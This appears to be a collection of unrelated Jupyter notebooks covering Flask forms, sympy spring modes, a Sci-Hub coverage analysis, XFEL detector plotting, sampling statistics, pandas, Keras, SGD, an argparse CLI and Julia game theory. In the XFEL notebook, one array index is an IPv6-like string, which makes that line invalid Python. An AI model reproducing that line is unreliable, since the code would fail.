# - Ahora, cuando reiniciamos nuestro servidor después de realizar estos cambios, y visitamos la página predeterminada con una URL como `/?name=David`, veremos esa misma entrada devuelta en el HTML generado por nuestro servidor.
#
#
# Podemos suponer que la consulta de búsqueda de Google, en / search? Q = cats, también se analiza mediante algún código para el parámetro q y se pasa a alguna base de datos para obtener todos los resultados que son relevantes. Luego, esos resultados se utilizan para generar la página HTML final.
# ## Forms
# Moviremos nuestra plantilla original a `greet.html`, para que reciba al usuario con su nombre. En `index.html`, crearemos un formulario:
#
# +
<!DOCTYPE html>
<html lang="en">
<head>
<title>hello</title>
</head>
<body>
<form action="/greet" method="get">
<input name="name" type="text">
<input type="submit">
</form>
</body>
</html>
# -
# - Enviaremos el formulario a la `/greet` ruta y tendremos una entrada para el `name` parámetro y otra para el botón de envío.
# - En nuestro `applications.py` controlador, también necesitaremos agregar una función para la `/greet` ruta, que es casi exactamente lo que teníamos `/` antes:
# +
@app.route("/")
def index():
return render_template("index.html")
@app.route("/greet")
def greet():
return render_template("greet.html", name=request.args.get("name", "world"))
# -
# - Nuestro formulario `index.html` será estático ya que puede ser el mismo en todo momento.
#
# Ahora, podemos ejecutar nuestro servidor, ver nuestro formulario en la página predeterminada y usarlo para generar otra página.
# ## Post
# - Nuestro formulario anterior utilizó el método GET, que incluye los datos de nuestro formulario en la URL.
# - Vamos a cambiar el método en nuestro HTML: `<form action="/greet" method="post">`. Nuestro controlador también deberá cambiarse para aceptar el método POST y buscar el parámetro en otro lugar:
@app.route("/greet", methods=["POST"])
def greet():
return render_template("greet.html", name=request.form.get("name", "world"))
# - Si bien `request.args` es para parámetros en una solicitud GET, tenemos que usar request.formen Flask para parámetros en una solicitud POST.
#
#
# Ahora, cuando reiniciamos nuestra aplicación después de realizar estos cambios, podemos ver que el formulario nos lleva a /greet, pero los contenidos ya no están incluidos en la URL.
# ## Layouts
# - En `index.html` y `greet.html`, tenemos un código HTML repetido. Solo con HTML, no podemos compartir código entre archivos, pero con las plantillas de Flask (y otros marcos web), podemos descartar ese contenido común.
# - Crearemos otra plantilla, `layout.html`:
# +
<!DOCTYPE html>
<html lang="en">
<head>
<title>hello</title>
</head>
<body>
{% block body %}{% endblock %}
</body>
</html>
# -
# Flask admite Jinja, un lenguaje de creación de plantillas, que utiliza la sintaxis `{% %}` para incluir bloques de marcadores de posición u otros fragmentos de código. Aquí hemos nombrado nuestro bloque `body` ya que contiene el HTML que debería ir en el elemento `<body>`.
# Del mismo modo, en `greet.html`, nosotros definimos the bloque `body` con solo el saludo:
#
# +
{% extends "layout.html" %}
{% block body %}
hello, {{ name }}
{% endblock %}
# -
# Ahora, si reiniciamos nuestro servidor y vemos el código fuente de nuestro HTML después de abrir la URL de nuestro servidor, vemos una página completa con nuestro formulario dentro de nuestro archivo HTML, generado por Flask.
#
# Incluso podemos reutilizar la misma ruta para admitir los métodos GET y POST:
@app.route("/", methods=["GET", "POST"])
def index():
if request.method == "POST":
return render_template("greet.html", name=request.form.get("name", "world"))
return render_template("index.html")
# - Primero, verificamos si el `method` de `request` es una solicitud POST. Si es así, buscaremos el `name` parámetro y devolveremos HTML de la `greet.html` plantilla. De lo contrario, devolveremos HTML de `index.html`, que tiene nuestro formulario.
# - También necesitaremos cambiar el formulario `action` a la `/` ruta predeterminada .
# # REFERENCIAS
# ----------------
# - Documentación oficial [Flask](https://flask.palletsprojects.com/en/2.0.x/quickstart/)
# - Documentación oficial [Jinja](https://jinja.palletsprojects.com/en/3.0.x/)
#
# - CS50 [Flask Video](https://cs50.harvard.edu/x/2021/weeks/9/)
|
Modulo5/4.Flask.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from sympy import*
init_printing()
k,m,w0,w = symbols('k,m,\omega_0,\omega')
m1,m2 = symbols('m_1,m_2')
# +
W = w0**2*Matrix([[2,-1,0,0],[-1,2,-1,0],[0,-1,2,-1],[0,0,-1,2]])
display(W)
w0=1
# -
solve(det(W - w**2*eye(4)),w**2)
W.eigenvals()
evecs = W.eigenvects()
for i in range(0,len(evecs)):
display(simplify(evecs[i][2][0]))
m2 = Matrix([[2*k/m1, k/m1],[k/m2,-k/m2]])
evecs2 = m2.eigenvects()
for i in range(0,len(evecs2)):
display(simplify(evecs2[i][2][0]))
|
teaching/PHY1110/DS/Code/.ipynb_checkpoints/DS10 - Four Masses and Five Springs-checkpoint.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .r
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: R [conda env:scihub]
# language: R
# name: conda-env-scihub-r
# ---
# # Associations between Journal Prestige and Sci-Hub Coverage
# Load magrittr pipe
`%>%` = dplyr::`%>%`
# ## Read data
# +
config = '00.configuration.json' %>% jsonlite::read_json()
scopus_col_types = list(
scopus_id = readr::col_character(), # R fails with big integers like 2200147401
open_access = readr::col_logical(),
active = readr::col_logical()
)
# -
# Read scopus journal metrics
metrics_df = paste0(config$scopus_url, 'data/metrics.tsv.gz') %>%
readr::read_tsv(col_types = scopus_col_types)
head(metrics_df, 2)
# +
journal_df = file.path('data', 'journal-coverage.tsv') %>%
readr::read_tsv(col_types = scopus_col_types)
head(journal_df, 2)
# -
# ## Distribution of Sci-Hub journal coverage
#
# Can be removed, since now performed in 6.visualize-coverage.
# +
# Set figure dimensions
width = 7
height = 2
options(repr.plot.width=width, repr.plot.height=height)
journal_df %>%
ggplot2::ggplot(ggplot2::aes(x = coverage, fill = open_access)) +
ggplot2::geom_histogram(binwidth = 0.01) +
ggplot2::scale_x_continuous(labels = scales::percent, name=NULL, expand = c(0, 0)) +
ggplot2::scale_y_continuous(name=NULL, expand = c(0, 0)) +
ggplot2::scale_fill_manual(name = NULL, values = c(`TRUE`='#F68212', `FALSE`='#000000')) +
ggplot2::theme_bw()
# -
# ## Coverage versus citation metrics
# +
citescore_2015_df = metrics_df %>%
dplyr::filter(year == 2015) %>%
dplyr::filter(metric == 'CiteScore') %>%
dplyr::transmute(scopus_id, citescore_2015 = value) %>%
dplyr::inner_join(journal_df)
nrow(citescore_2015_df)
head(citescore_2015_df, 2)
# -
# ### Sci-Hub Coverage versus CiteScore Decile
# +
quantiles = quantile(citescore_2015_df$citescore_2015, probs = seq(0, 1, 0.1))
citescore_coverage_df = citescore_2015_df %>%
dplyr::mutate(citescore_2015_decile = as.factor(dplyr::ntile(citescore_2015, 10))) %>%
dplyr::group_by(citescore_2015_decile) %>%
dplyr::summarize(
mean_coverage = mean(coverage),
sd_coverage = sd(coverage),
coverage_ci_lower = Hmisc::smean.cl.normal(coverage, conf.int = 0.99)['Lower'],
coverage_ci_upper = Hmisc::smean.cl.normal(coverage, conf.int = 0.99)['Upper'],
journals = n()
) %>%
dplyr::mutate(citescore_lower = quantiles[1:10]) %>%
dplyr::mutate(citescore_upper = quantiles[2:11]) %>%
dplyr::mutate(label = sprintf("%.2f–%.3g", citescore_lower, citescore_upper))
citescore_coverage_df
# +
# Set figure dimensions
width = 3
height = 2.5
options(repr.plot.width=width, repr.plot.height=height)
gg = citescore_coverage_df %>%
ggplot2::ggplot(ggplot2::aes(x = citescore_2015_decile, y = mean_coverage)) +
ggplot2::geom_col(alpha=1, color='white', fill='#efdada') +
ggplot2::geom_linerange(ggplot2::aes(ymin = coverage_ci_lower, ymax = coverage_ci_upper), color='#990000') +
ggplot2::scale_x_discrete(name='CiteScore Decile', expand=c(0.015, 0), labels = citescore_coverage_df$label) +
ggplot2::scale_y_continuous(labels = scales::percent, name='Sci-Hub Coverage', breaks = seq(0, 1, 0.2), expand=c(0, 0)) +
ggplot2::expand_limits(y=1) +
ggplot2::theme_bw() +
ggplot2::theme(
axis.text.x = ggplot2::element_text(angle=37, hjust=1, vjust=1),
panel.grid.major.x = ggplot2::element_blank()
)
file.path('figure', 'coverage-versus-citescore-decile.svg') %>%
ggplot2::ggsave(plot = gg, width = width, height = height)
saveRDS(gg, file.path('figure', 'coverage-versus-citescore-decile.rds'))
gg
# -
# ### CiteScore versus Sci-Hub Coverage
# +
# Set figure dimensions
width = 3
height = 2
options(repr.plot.width=width, repr.plot.height=height)
citescore_2015_df %>%
dplyr::mutate(citescore_2015_log1p = log1p(citescore_2015)) %>%
ggplot2::ggplot(ggplot2::aes(x = coverage, y = citescore_2015_log1p)) +
ggplot2::stat_summary_bin(binwidth=0.05, fun.data = 'mean_cl_normal', right=TRUE, geom='bar', alpha=0.5, color='white') +
ggplot2::stat_summary_bin(binwidth=0.05, fun.data = 'mean_cl_normal', right=TRUE, geom='linerange') +
ggplot2::scale_x_continuous(labels = scales::percent, name='Sci-Hub Coverage', breaks = seq(0, 1, 0.2), expand=c(0.01, 0)) +
ggplot2::scale_y_continuous(name='Log CiteScore', expand=c(0, 0)) +
ggplot2::expand_limits(y=0.95) +
ggplot2::theme_bw()
# -
# ### Sci-Hub Coverage versus Journal Metrics
# +
# Set figure dimensions
width = 7
height = 8
options(repr.plot.width=width, repr.plot.height=height)
breaks = round(exp(seq(0, 4.5, 0.7)) - 1)
metrics_df %>%
dplyr::inner_join(journal_df) %>%
ggplot2::ggplot(ggplot2::aes(x = value, y = coverage)) +
ggplot2::geom_hex() +
ggplot2::scale_fill_continuous(trans = 'log10') +
ggplot2::facet_grid(year ~ metric, scales = 'free_x') +
ggplot2::scale_x_continuous(trans='log1p', breaks=breaks) +
ggplot2::scale_y_continuous(labels = scales::percent) +
ggplot2::theme_bw()
|
07.journal-prestige.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: xfel
# language: python
# name: xfel
# ---
import numpy as np
import h5py
from pathlib import Path
from extra_geom import AGIPD_1MGeometry
from cxiapi import cxiData
import matplotlib.pyplot as plt
from p_tqdm import p_umap, p_map
from functools import partial
import multiprocessing as mp
# Experiment run number.
run = 364
# Hitfinding on which module.
module = 15
# Number of CPU processes to use, '0' means using all.
nproc = 0
# The folder of cxi files
cxi_folder = '/gpfs/exfel/u/scratch/SPB/202130/p900201/spi-comission/vds/'
# Cheetah files folder for calibration
calib_folder = '/gpfs/exfel/exp/SPB/202130/p900201/usr/Software/calib/r0361-r0362-r0363/'
# Geometry file for the detector
geom_file = '/gpfs/exfel/exp/SPB/202130/p900201/usr/Software/geom/agipd_2696_v5.geom'
# +
cxi_path = Path(cxi_folder, f'r{run:04}.cxi')
fn = str(cxi_path)
cxi = cxiData(fn, verbose=1, debug=0)
pulse = np.arange(0, 352)
base_pulse_filter = np.ones(600, dtype="bool")
base_pulse_filter[len(pulse):] = False
base_pulse_filter[0] = False
base_pulse_filter[fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b] = False
base_pulse_filter[29::32] = False
good_cells = pulse[base_pulse_filter[:len(pulse)]]
cxi.setGoodCells(good_cells)
cxi.setCalib(calib_folder)
cxi.setGeom(geom_file)
# -
# ## Fast plot
cxi.fastPlotCalibDetector(300)
cxi.setADU_per_photon(45)
cxi.plot(300, ADU=False)
ROI = ((500,800), (430,700))
cxi.plot(300, ROI_value=ROI, ADU=False)
# ## Modules
# plt.colorbar()
ROI = ((512-50,None), (None,51))
cxi.cleanModuleMasks()
cxi.plot(300,15, ADU=False, transpose=True)
cxi.plot(300,15, ROI_value = ROI, ADU=False, transpose=True)
# ### Plot in ADU
cxi.plot(300,15, ROI_value = ROI, ADU=True, transpose=True)
# ## Mask to clean up
mask = np.ones((512,128))
mask[470:473,15:18] = 0
cxi.setModuleMasks(15,mask)
ROI = ((512-50,None), (None,51))
cxi.plot(300,15, ROI_value = ROI, ADU=False, transpose=True)
cxi.cleanModuleMasks()
# ### Adjust plot kwargs
cxi.plot(300,15, ROI_value = ROI, ADU=False, transpose=True, module_mask=mask, vmax=5)
ROI = ((500,800), (430,700))
cxi.plot(300, ROI_value=ROI, ADU=False)
# ## Fixed gain
cxi.plot(300, ROI_value=ROI, ADU=True, vmax=90)
cxi.setGainMode(0)
cxi.plot(300, ROI_value=ROI, ADU=True, vmax=90)
cxi.setGainMode(None)
|
examples/newCXI.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [Root]
# language: python
# name: Python [Root]
# ---
# HIDDEN
from datascience import *
from prob140 import *
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('fivethirtyeight')
# %matplotlib inline
from scipy import stats
# ## Finite Population Correction ##
# Data scientists often have to work with a relatively small sample from an enormous population. So suppose we are drawing at random $n$ times from a population of size $N$ where $N$ is large and $n$ is small relative to $N$. Just go with the flow for now – all of this will become more precise as this section develops.
#
# Suppose the population mean is $\mu$ and the population SD is $\sigma$. Let $S_n$ be the sample sum. Then, regardless of whether the sample is drawn with replacement or without,
# $$
# E(S_n) = n\mu
# $$
#
# The variance of the sample sum is different in the two cases.
#
# |$~~~~~~~~~~~~~~~~~$ | sampling with replacement | sampling without replacement|
# |:---------:|:-------------------------:|:---------------------------:|
# |$Var(S_n)$ |$n\sigma^2$ | $n\sigma^2\frac{N-n}{N-1}$ |
# |$SD(S_n)$ |$\sqrt{n}\sigma$ | $\sqrt{n}\sigma\sqrt{\frac{N-n}{N-1}}$ |
# The "without replacement" column is the same as the "with replacement" column apart from what are called *correction factors*. The one for the SD is called the *finite population correction* or fpc.
#
# $$
# \text{finite population correction} ~ = ~ \sqrt{\frac{N-n}{N-1}}
# $$
#
# The name arises because sampling with replacement can be thought of as sampling without replacement from an infinite population. Every time you draw, you leave the proportions in the population exactly the same as they were before you drew.
#
# A more realistic version of that image is drawing without replacement from an enormous finite population. Every time you draw, you leave the proportions in the population *almost* exactly the same as they were before you drew.
#
# We used this idea earlier when we said that sampling without replacement is almost the same as sampling with replacement provided you are drawing a relatively small sample from a very large population.
#
# The fpc gives us a way to quantify this idea.
# ### The Size of the FPC ###
# First note that when $N$ is even moderately large,
# $$
# \frac{N-n}{N-1} ~ \approx ~ \frac{N-n}{N} ~ = ~ 1 - \frac{n}{N}
# $$
#
# which is the fraction of the population that is left after sampling.
#
# If $N$ is large and $n$ is small relative to $N$, then
#
# $$
# \frac{N-n}{N-1} ~ \approx ~ 1 - \frac{n}{N} ~ \approx ~ 1
# $$
# which also implies
# $$
# \sqrt{\frac{N-n}{N-1}} ~ \approx ~ 1
# $$
#
# So whether you are sampling with replacement or without, the variance of the sample sum can be taken to be $n\sigma^2$. The formula is exact in the case of sampling with replacement and an excellent approximation in the case of sampling without replacement from a large population when the sample size is small relative to the population size.
#
# The table below gives the fpc for a variety of population and sample sizes.
# +
pop = make_array(1000, 10000, 50000, 100000, 500000, 1000000)
def fpc(pct):
samp = np.round(pop*pct/100, 0)
return np.round(((pop-samp)/(pop-1))**0.5, 6)
# -
Table().with_columns(
'Population Size', pop,
'1% Sample', fpc(1),
'5% Sample', fpc(5),
'10% Sample', fpc(10),
'20% Sample', fpc(20)
)
# The values in each column are essentially constant, because each is essentially the square root of the fraction *not* sampled:
# +
sample_pct = make_array(1, 5, 10, 20)
(1 - sample_pct/100)**0.5
# -
# All of these fpc values are fairly close to 1, especially in the 1% column where they are all essentially 0.995. That is why the fpc is often dropped from variance calculations.
# ### The (Non) Effect of the Population Size ###
# The SD of a simple random sample sum depends only on the sample size and the population SD, provided the population size is large enough that the fpc is close to 1.
#
# That's clear from the formula. If the fpc is close to 1, as it often is, then
#
# $$
# SD(S_n) \approx \sqrt{n}\sigma
# $$
#
# which involves only the sample size $n$ and the population SD $\sigma$.
#
# To understand this intuitively, suppose you are trying to determine the composition of a liquid based on the amount in a test tube. If the liquid is well mixed, does it matter whether the amount in the test tube was drawn from a bowl or from a bathtub? It doesn't, because both the bowl and the bathtub are so much larger than the test tube that they might as well be inifinite.
|
content/Chapter_13/04_Finite_Population_Correction.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # MPG Cars
# ### Introduction:
#
# The following exercise utilizes data from [UC Irvine Machine Learning Repository](https://archive.ics.uci.edu/ml/datasets/Auto+MPG)
#
# ### Step 1. Import the necessary libraries
# + jupyter={"outputs_hidden": false}
import pandas as pd
import numpy as np
# -
# ### Step 2. Import the first dataset [cars1](https://raw.githubusercontent.com/guipsamora/pandas_exercises/master/05_Merge/Auto_MPG/cars1.csv) and [cars2](https://raw.githubusercontent.com/guipsamora/pandas_exercises/master/05_Merge/Auto_MPG/cars2.csv).
# ### Step 3. Assign each to a variable called cars1 and cars2
# + jupyter={"outputs_hidden": false}
url1 = 'https://raw.githubusercontent.com/guipsamora/pandas_exercises/master/05_Merge/Auto_MPG/cars1.csv'
url2 = 'https://raw.githubusercontent.com/guipsamora/pandas_exercises/master/05_Merge/Auto_MPG/cars2.csv'
df= pd.read_csv(url1, sep = ',')
df2= pd.read_csv(url2, sep = ',')
# -
df.head(3)
df2.head(3)
# ### Step 4. Oops, it seems our first dataset has some unnamed blank columns, fix cars1
df = df.iloc[:, 0:9]
df.head(3)
# + jupyter={"outputs_hidden": false}
# -
# ### Step 5. What is the number of observations in each dataset?
# + jupyter={"outputs_hidden": false}
df.info()
# -
df2.info()
# ### Step 6. Join cars1 and cars2 into a single DataFrame called cars
# + jupyter={"outputs_hidden": false}
coches = df.append(df2)
coches
# -
# ### Step 7. Oops, there is a column missing, called owners. Create a random number Series from 15,000 to 73,000.
# + jupyter={"outputs_hidden": false}
coches['owners'] = np.random.randint(15000, 73000, coches.shape[0])
# -
coches.head(2)
# ### Step 8. Add the column owners to cars
# + jupyter={"outputs_hidden": false}
|
05_Merge/Auto_MPG/Exercises.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# **File name**: dispersion_values.ipynb<br>
# **Authors**: <NAME> <[<EMAIL>](mailto:<EMAIL>)>, <NAME> <[<EMAIL>](mailto:<EMAIL>)>
#
# This file is part of REDE project (https://github.com/akarazeev/REDE)
#
# **Description**: ...
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy import interpolate
import os
import tqdm
import pickle
import scipy.io as spio
# +
# %load_ext autoreload
# %autoreload 2
from prepare_dataset_keras import preproc
# -
def df_by_filepath(filepath):
# Load data.
mat = spio.loadmat(filepath, squeeze_me=True)
struct = mat['str']
header = ['id']
header.extend(struct[0][1].dtype.names)
header
# Create DataFrame.
dataset = []
for i in range(len(struct)):
tmp = [int(struct[i][0])]
tmp.extend([float(struct[i][1][name]) for name in header[1:]])
dataset.append(tmp)
df_data = pd.DataFrame(data=dataset, columns=header)
return df_data, struct
df_data, struct = df_by_filepath('matlab_data/set_1848_elements.mat')
df_data.head()
# +
# Generate dataset.
frequencies_modes_list = []
parameters_list = []
dispersions = []
for filepath in ['matlab_data/set_1848_elements.mat']:
df_data, struct = df_by_filepath(filepath)
for i in tqdm.tqdm(range(len(struct))):
# Parameters.
sample_id = int(struct[i][0])
parameters = df_data[df_data['id'] == sample_id].values[0][1:]
parameters_list.append(parameters)
# Frequencies and modes.
freqs, modes = struct[i][2][:, 0].real, struct[i][2][:, 2].real
frequencies_modes_list.append((freqs, modes))
# Dispersions.
omega_total, delta_omega_total, D1_total, D2_total = preproc(freqs, modes)
x = omega_total * 1e-12
y = delta_omega_total * 1e-9
dispersions.append((x, y))
# -
[len(x[0]) for x in dispersions[:10]]
# +
x, y = dispersions[1000]
plt.figure(figsize=(10,5))
plt.scatter(x[::300], y[::300]) # Plot each 300 data point.
plt.xlabel("Frequency (THz)")
plt.ylabel("Mode deviation (GHz)")
plt.title("Modal spectral deviation in SiN resonator")
plt.show()
# -
# Parameters for 1000th simulation.
parameters_list[1000]
x[:10]
y[:10]
|
utils/dispersion_values_keras.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: base [py3]
# language: python
# name: python3
# ---
import argparse
from os.path import expanduser
def _make_base_parser():
"""Configure the base parser that the other subcommands will inherit from
Returns
-------
ArgumentParser
"""
main_parser = argparse.ArgumentParser(
prog='livy-submit',
description="CLI for interacting with the Livy REST API",
)
main_parser.add_argument(
'--conf-file',
action='store',
default=expanduser('~/.livy-submit'),
help="The location of the livy submit configuration file"
)
subparser = main_parser.add_subparsers(
title='Livy CLI subcommands',
)
return main_parser, subparser
# +
def run_endpoint_info(args):
print(args)
def _make_livy_info_parser(base_parser):
"""Configure the `livy info` subparser
Parameters
----------
base_parser
Returns
-------
ArgumentParser
"""
livy_info_parser = base_parser.add_parser('info')
livy_info_parser.add_argument(
'--short',
action='store_true',
default=False,
help="Only show the current status of the job"
)
livy_info_parser.add_argument(
'batchId',
action='store',
# required=False,
help="The Livy batch ID for which you want information"
)
livy_info_parser.set_defaults(func=run_endpoint_info)
return livy_info_parser
# -
def make_parser():
main_parser, subparser = _make_base_parser()
_make_livy_info_parser(subparser)
return main_parser, subparser
main_parser, subparser = make_parser()
args = main_parser.parse_args(['info', '123', '--short'])
args.func(args)
# ## Expected user input for `livy info`
# `$ livy info`
#
# `$ livy info --short`
#
# `$ livy info 123`
#
# `$ livy info 123 --short`
#
#
def validate_parser():
main_parser, subparser = make_parser()
livy_info_parser = subparser.add_parser('info')
main_parser.parse_args(['--help'])
main_parser.parse_args(['info', '--help'])
|
dev-notebooks/parser.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/jsqihui/ai/blob/master/_notebooks/2020_12_16_SGD_1.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="Rz7zuSy1Skpc"
# # SGD 实验1
# > SGD以及ML基本步骤
#
# - toc: true
# - branch: master
# - badges: true
# - comments: true
# - author: jsqihui
# - categories: [fast.ai]
#
#
# + id="GBpqe_FH6Zof" colab={"base_uri": "https://localhost:8080/"} outputId="db0ac6a1-529f-4d39-a298-cbda69485c47"
#hide
# !pip install -Uqq fastbook
import fastbook
fastbook.setup_book()
from fastai.vision.all import *
from fastbook import *
matplotlib.rc('image', cmap='Greys')
# + [markdown] id="UxwrbA8k8Ddm"
# 假设我们有一个问题就是推测出过山车的速度模型,已知数据是过山车在0到20每个时间点的速度
# + colab={"base_uri": "https://localhost:8080/", "height": 265} id="ZpmjkPDW7Upx" outputId="e635ba3c-40f5-4609-9fce-7935aa0a5373"
time = torch.arange(0,20).float()
speed = torch.randn(20)*3 + 0.75*(time-9.5)**2 + 1
plt.scatter(time,speed);
# + [markdown] id="ECZHLyzn9OXA"
# 推测出architecture可能是个二阶多项式,然后要确定其中的参数,parameters
# + id="QGROL6d06Zph"
def f(t, params):
a,b,c = params
return a*(t**2) + (b*t) + c
# + [markdown] id="7qBac_A99qpu"
# 有了architecture后,还要找出一个loss function,这个loss function来确定对某parameters,它的performance如何,loss function的值越小越好
# + id="beJ4keYE6Zpi"
def mse(preds, targets): return ((preds-targets)**2).mean().sqrt()
# + [markdown] id="uYH1DKeR-I4U"
# 现在的任务就是要找出这个参数,第一步初始化参数
# + id="8rIg8AiK-BjT"
params = torch.randn(3).requires_grad_()
# + [markdown] id="WKC6luRGBkmU"
# 用一个函数显示出当前预测数据和实际数据的差别
# + id="tBJKglEI-boL"
def show_preds(preds, ax=None):
if ax is None: ax=plt.subplots()[1]
ax.scatter(time, speed)
ax.scatter(time, to_np(preds), color='red')
ax.set_ylim(-300,100)
# + [markdown] id="JOk1T1-QCJDP"
# 下面函数的执行步骤
#
# 1. 用当前的params做出预测
# 2. 利用当前预测和loss function求出loss
# 3. loss.backward用来求出当前参数的gradient
# 4. 利用learning rate(lr)和当前的gradient来移动当前的params
# 5. 求出loss
# + id="MFYgX2YWAE0M"
lr = 1e-3
def apply_step(params, prn=True):
preds = f(time, params)
loss = mse(preds, speed)
loss.backward()
params.data -= lr * params.grad.data
params.grad = None
if prn: print(loss.item())
return preds
# + colab={"base_uri": "https://localhost:8080/"} id="zllxK_-lAWO1" outputId="746076a0-a8cb-4b8a-960a-eb4eda787a75"
#collapse-output
for i in range(10): apply_step(params)
# + id="Ohq8yw4E6Zpt" colab={"base_uri": "https://localhost:8080/", "height": 225} outputId="4a3c0104-cc87-49d4-a1b6-3348fb4ddfe0"
_,axs = plt.subplots(1,4,figsize=(12,3))
for ax in axs: show_preds(apply_step(params, False), ax)
plt.tight_layout()
# + [markdown] id="m19quNAQEN_B"
# # 有点难以理解的部分
# + [markdown] id="gzRBnMkrE1Tn"
# loss.backward用来求当前的parameter的gradient,首先要明确目的:需要调整parameter使得loss更低。也就是说对于函数loss_function(params),调整params使得函数值更小。简单的方法就是对loss_function() 求微分,比如说 loss_function = x^2, 当前x是6,那么当前的loss = 6^2 = 36,如何调整当前的x使得loss变小呢。只要求微分,也就是 (loss_function) = 2*x,然后用x减去微分方向上的一个小小的值(利用lr,learning rate),那么更新后的x就是 new_x = x - lr*2*x = 6 - 0.1*2*6 = 4.8。这样求出来的new_x,再次代入loss_function,得到loss = 4.8^2 就比之前的6^2更小了。
|
_notebooks/2020-12-16-SGD-1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
import numpy as np
from sklearn import datasets
# + [markdown] tags=["meta", "draft"]
# # Keras Hello World
# -
# ## Install Keras
#
# https://keras.io/#installation
#
# ### Install dependencies
#
# Install TensorFlow backend: https://www.tensorflow.org/install/
#
# ```
# pip install tensorflow
# ```
#
# Insall h5py (required if you plan on saving Keras models to disk): http://docs.h5py.org/en/latest/build.html#wheels
#
# ```
# pip install h5py
# ```
#
# Install pydot (used by visualization utilities to plot model graphs): https://github.com/pydot/pydot#installation
#
# ```
# pip install pydot
# ```
#
# ### Install Keras
#
# ```
# pip install keras
# ```
# ## Import packages and check versions
import tensorflow as tf
tf.__version__
import keras
keras.__version__
import h5py
h5py.__version__
import pydot
pydot.__version__
# +
from keras.models import Sequential
model = Sequential()
# +
from keras.layers import Dense
model.add(Dense(units=6, activation='relu', input_dim=4))
model.add(Dense(units=3, activation='softmax'))
# +
from keras.utils import plot_model
plot_model(model, show_shapes=True, to_file="model.png")
# -
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
iris = datasets.load_iris()
# TODO: shuffle
x_train = iris.data
y_train = np.zeros(shape=[x_train.shape[0], 3])
y_train[(iris.target == 0), 0] = 1
y_train[(iris.target == 1), 1] = 1
y_train[(iris.target == 2), 2] = 1
x_test = x_train
y_test = y_train
model.fit(x_train, y_train)
model.evaluate(x_test, y_test)
model.predict(x_test)
|
nb_dev_python/python_keras_hello_en.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 1.4.0
# language: julia
# name: julia-1.4
# ---
# # Tools for Game Theory in Games.jl
# **<NAME>**
# *Faculty of Economics, University of Tokyo*
# This notebook demonstrates the functionalities of [Games.jl](https://github.com/QuantEcon/Games.jl).
# The first time you run this notebook,
# you need to install the Games.jl package by removing the "#" below:
# +
# using Pkg; Pkg.add("https://github.com/QuantEcon/Games.jl")
# -
using Games
# ## Normal Form Games
# An $N$-player *normal form game* is a triplet $g = (I, (A_i)_{i \in I}, (u_i)_{i \in I})$ where
#
# * $I = \{1, \ldots, N\}$ is the set of players,
# * $A_i = \{1, \ldots, n_i\}$ is the set of actions of player $i \in I$, and
# * $u_i \colon A_i \times A_{i+1} \times \cdots \times A_{i+N-1} \to \mathbb{R}$
# is the payoff function of player $i \in I$,
#
# where $i+j$ is understood modulo $N$.
#
# Note that we adopt the convention that the $1$-st argument of the payoff function $u_i$ is
# player $i$'s own action
# and the $j$-th argument, $j = 2, \ldots, N$, is player ($i+j-1$)'s action (modulo $N$).
# In our package,
# a normal form game and a player are represented by
# the types `NormalFormGame` and `Player`, respectively.
#
# A `Player` carries the player's payoff function and implements in particular
# a method that returns the best response action(s) given an action of the opponent player,
# or a profile of actions of the opponents if there are more than one.
#
# A `NormalFormGame` is in effect a container of `Player` instances.
# ### Creating a `NormalFormGame`
# There are several ways to create a `NormalFormGame` instance.
# The first is to pass an array of payoffs for all the players, i.e.,
# an $(N+1)$-dimenstional array of shape $(n_1, \ldots, n_N, N)$
# whose $(a_1, \ldots, a_N)$-entry contains an array of the $N$ payoff values
# for the action profile $(a_1, \ldots, a_N)$.
# As an example, consider the following game ("**Matching Pennies**"):
#
# $
# \begin{bmatrix}
# 1, -1 & -1, 1 \\
# -1, 1 & 1, -1
# \end{bmatrix}
# $
matching_pennies_bimatrix = Array{Float64}(undef, 2, 2, 2)
matching_pennies_bimatrix[1, 1, :] = [1, -1] # payoff profile for action profile (1, 1)
matching_pennies_bimatrix[1, 2, :] = [-1, 1]
matching_pennies_bimatrix[2, 1, :] = [-1, 1]
matching_pennies_bimatrix[2, 2, :] = [1, -1]
g_MP = NormalFormGame(matching_pennies_bimatrix)
g_MP.players[1] # Player instance for player 1
g_MP.players[2] # Player instance for player 2
